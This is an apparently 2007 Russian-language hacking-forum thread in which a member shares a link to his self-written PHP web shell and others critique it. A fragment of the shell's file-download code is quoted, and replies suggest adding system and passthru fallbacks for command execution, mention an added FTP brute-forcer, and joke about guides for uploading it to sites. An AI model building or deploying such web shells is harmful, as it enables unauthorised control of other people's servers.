шелл от меня=)

Discussion in 'PHP' started by GreenBear, 11 Apr 2007.

  1. GreenBear

    GreenBear наркоман с медалью

    Joined:
    7 May 2005
    Messages:
    2,547
    Likes Received:
    1,398
    Reputations:
    612
    в общем тут традиция делать шеллы , а я так посмотрел ни разу не сделал =\
    естественно онли пост
    http://netsec.ru/gb_old/src/shell.phps
     
    #1 GreenBear, 11 Apr 2007
    Last edited: 24 May 2007
    11 people like this.
  2. x-treem

    x-treem Elder - Старейшина

    Joined:
    8 Nov 2006
    Messages:
    130
    Likes Received:
    16
    Reputations:
    0
    похож на шелл ак74
    а по делу...
    что за тёмносерый текст на светлосером фоне???
    пощади глаза
     
  3. darky

    darky ♠ ♦ ♣ ♥

    Joined:
    18 May 2006
    Messages:
    1,773
    Likes Received:
    825
    Reputations:
    1,418
    В окне листинга неплохо бы сделать выравнивание по колонкам вывода .. сейчас просмотр листинга немного затруднен )
    алиасы... мм.. да в принципе не вижу смысла искать конфиг.инк.пхп ))) + ты еще и по маске конфиги ищещь..
     
  4. GreenBear

    GreenBear наркоман с медалью

    Joined:
    7 May 2005
    Messages:
    2,547
    Likes Received:
    1,398
    Reputations:
    612
    ну вообще то я не ищу
    просто добавил из р57 =\
    как и шелами я тоже не пользуюсь)
    про цвета букв - имхо нормально видно
     
  5. Goudini

    Goudini Elder - Старейшина

    Joined:
    7 Jun 2006
    Messages:
    132
    Likes Received:
    134
    Reputations:
    91
    фигово в сейфмоде работает, и в винде вообще
    Code:
    Warning: set_time_limit() [function.set-time-limit]: Cannot set time limit in safe mode
     
    2 people like this.
  6. banned

    banned Banned

    Joined:
    20 Nov 2006
    Messages:
    3,324
    Likes Received:
    1,193
    Reputations:
    252
    Так если safe-mode, то
    PHP:
    max_execution_time(0);
     
    #6 banned, 11 Apr 2007
    Last edited: 11 Apr 2007
  7. nc.STRIEM

    nc.STRIEM Members of Antichat

    Joined:
    5 Apr 2006
    Messages:
    1,036
    Likes Received:
    347
    Reputations:
    292
    молодец! все просто и ясно, без наворотов)

    ps напиши еще подробный манул по его заливке)))
     
    1 person likes this.
  8. n1†R0x

    n1†R0x Elder - Старейшина

    Joined:
    20 Jan 2007
    Messages:
    728
    Likes Received:
    376
    Reputations:
    235
    норм) поюзаем..

    да-да, по заливке для каждого форума/цмс, а то че с ним делать :confused: :p
     
  9. GreenBear

    GreenBear наркоман с медалью

    Joined:
    7 May 2005
    Messages:
    2,547
    Likes Received:
    1,398
    Reputations:
    612
    Обновил.)
     
  10. x-treem

    x-treem Elder - Старейшина

    Joined:
    8 Nov 2006
    Messages:
    130
    Likes Received:
    16
    Reputations:
    0

    Так получше будет.
     
  11. banned

    banned Banned

    Joined:
    20 Nov 2006
    Messages:
    3,324
    Likes Received:
    1,193
    Reputations:
    252
    GreenBear, если сейф мод включен, то будет не корректно пахать
    Напиши еще так
    PHP:
     max_execution_time(0);  
     
  12. hidden

    hidden 7H3 0N3

    Joined:
    23 Apr 2006
    Messages:
    550
    Likes Received:
    332
    Reputations:
    386
    Критика :)

    Первое с чем я столкнулся, то что шелл у тебя в UTF-8, а сервер netsec'a отвечает:
    Code:
    Content-Type: text/html; charset=windows-1251
    Code:
    [color=#00AA00][color=#00FF00]if[/COLOR][color=#0000FF]([/COLOR]$_POST[color=#0000FF][[/COLOR][/COLOR][color=#FFFF00]'download'[/COLOR][color=#00AA00][color=#0000FF]])[/COLOR][color=#FF0000]{[/COLOR]
        [color=#00FF00]header[/COLOR][color=#0000FF]([/COLOR][/COLOR][color=#FFFF00]'Content-Length:'[/COLOR][color=#00AA00][color=#0000FF].[/COLOR][color=#00FF00]filesize[/COLOR][color=#0000FF]([/COLOR][/COLOR][color=#FFFF00]'[color=#FF0000]/[/COLOR]tmp[color=#FF0000]/[/COLOR]'[/COLOR][color=#00AA00][color=#0000FF].[/COLOR]$_POST[color=#0000FF][[/COLOR][/COLOR][color=#FFFF00]'download'[/COLOR][color=#00AA00][color=#0000FF]].[/COLOR][/COLOR][color=#FFFF00]'.sql'[/COLOR][color=#00AA00][color=#0000FF]).[/COLOR][/COLOR][color=#FFFF00]' '[/COLOR][color=#00AA00][color=#0000FF])[/COLOR][color=#FF0000];[/COLOR]
        [color=#00FF00]header[/COLOR][color=#0000FF]([/COLOR][/COLOR][color=#FFFF00]'Content-Type: application/octet-stream'[/COLOR][color=#00AA00][color=#0000FF])[/COLOR][color=#FF0000];[/COLOR]
        [color=#00FF00]header[/COLOR][color=#0000FF]([/COLOR][/COLOR][color=#FFFF00]"Content-Disposition: attachment; filename={[color=#00AA00]$_POST[/COLOR]['download']}.sql"[/COLOR][color=#00AA00][color=#0000FF])[/COLOR][color=#FF0000];[/COLOR]
        [color=#00FF00]readfile[/COLOR][color=#0000FF]([/COLOR][/COLOR][color=#FFFF00]'[color=#FF0000]/[/COLOR]tmp[color=#FF0000]/[/COLOR]'[/COLOR][color=#00AA00][color=#0000FF].[/COLOR]$_POST[color=#0000FF][[/COLOR][/COLOR][color=#FFFF00]'download'[/COLOR][color=#00AA00][color=#0000FF]].[/COLOR][/COLOR][color=#FFFF00]'.sql'[/COLOR][color=#00AA00][color=#0000FF])[/COLOR][color=#FF0000];[/COLOR]
        [color=#00FF00]die[/COLOR][color=#0000FF]()[/COLOR][color=#FF0000];
    }[/COLOR]
    $_POST[color=#0000FF][[/COLOR][/COLOR][color=#FFFF00]'dir'[/COLOR][color=#00AA00][color=#0000FF]] ?[/COLOR] $dir [color=#0000FF]=[/COLOR] $_POST[color=#0000FF][[/COLOR][/COLOR][color=#FFFF00]'dir'[/COLOR][color=#00AA00][color=#0000FF]][/COLOR] : $dir [color=#0000FF]=[/COLOR] [color=#00FF00]getcwd[/COLOR][color=#0000FF]()[/COLOR][color=#FF0000];[/COLOR]
    [color=#00FF00]if[/COLOR][color=#0000FF]([/COLOR][color=#00FF00]get_magic_quotes_gpc[/COLOR][color=#0000FF]())[/COLOR] [color=#00FF00]foreach[/COLOR][color=#0000FF]([/COLOR]$_POST [color=#00FF00]as[/COLOR] $k[color=#0000FF]=>[/COLOR]$v[color=#0000FF])[/COLOR] $_POST[color=#0000FF][[/COLOR]$k[color=#0000FF]] =[/COLOR] [color=#00FF00]stripslashes[/COLOR][color=#0000FF]([/COLOR]$v[color=#0000FF])[/COLOR][color=#FF0000];[/COLOR][/COLOR]
    Как насчёт убрать слэши из переменных до использования последних?

    хорошо-бы добавить поддержку использования взаимозаменяемых функций, например в my_exec, кроме popen, добавить system и passthu

    ИМХО, яркий действительно глаза напрягает.

    Про js, который не нужен я ничего говорить не буду.))

    Кстати, не пробовал его проинклудить не первым? Как выглядит?

    А вот вопрос, уже давно меня интересует:
    Для чего все как один, делают авторизацию по Имени и Паролю, если всё-равно пользователь может быть только 1 ?
     
  13. GreenBear

    GreenBear наркоман с медалью

    Joined:
    7 May 2005
    Messages:
    2,547
    Likes Received:
    1,398
    Reputations:
    612
    ты про довнлоад?) а смысл если файл все равно число? да и добавил я уже после )
    если чесно то тоже не вижу смысла.
    мне так удобнее делать =\
    автоматом.
     
  14. hidden

    hidden 7H3 0N3

    Joined:
    23 Apr 2006
    Messages:
    550
    Likes Received:
    332
    Reputations:
    386
    Нет, чтоб не получались вот такие пути "C:\\\\\\\\www\\\\\\\\http\\\\\\\\"

    Просто некоторые функции бывают отключены, а про другие забывают.
     
  15. GreenBear

    GreenBear наркоман с медалью

    Joined:
    7 May 2005
    Messages:
    2,547
    Likes Received:
    1,398
    Reputations:
    612
    ну где выключен попен, там и все другие типа систем, ексек тоже =\ в основном. добавить не сложно конечно, но смысла не вижу)
     
    #15 GreenBear, 13 Apr 2007
    Last edited: 13 Apr 2007
  16. GreenBear

    GreenBear наркоман с медалью

    Joined:
    7 May 2005
    Messages:
    2,547
    Likes Received:
    1,398
    Reputations:
    612
    Обновление.
    Добавлен фтп брут
    качать там же
     
  17. Boccob

    Boccob Elder - Старейшина

    Joined:
    4 May 2007
    Messages:
    37
    Likes Received:
    18
    Reputations:
    1
    ОШИБКА
    Запрошенный Url не может быть доставлен

    Это только у меня так?
     
  18. -=lebed=-

    -=lebed=- хэшкрякер

    Joined:
    21 Jun 2006
    Messages:
    3,804
    Likes Received:
    1,960
    Reputations:
    594
    нет, сайт не доступен Гринбира...
     
  19. GreenBear

    GreenBear наркоман с медалью

    Joined:
    7 May 2005
    Messages:
    2,547
    Likes Received:
    1,398
    Reputations:
    612
    http://netsec.ru/gb_old/src/shell.phps
     
    1 person likes this.
  20. ultimatum

    ultimatum Elder - Старейшина

    Joined:
    28 Apr 2007
    Messages:
    142
    Likes Received:
    65
    Reputations:
    -13
    спасибо молодец, пользуюсь ак57, но твой тоже придёться затестить )))

    +

    меня почему-то постоянно куда ненажимаю бросает на страничку с логином и пассом .Набираю test и всё ровно.
    Тест провожу на винде
    И на хосте под линухой такая же ботва.Хост на агаве
     
    #20 ultimatum, 24 May 2007
    Last edited: 25 May 2007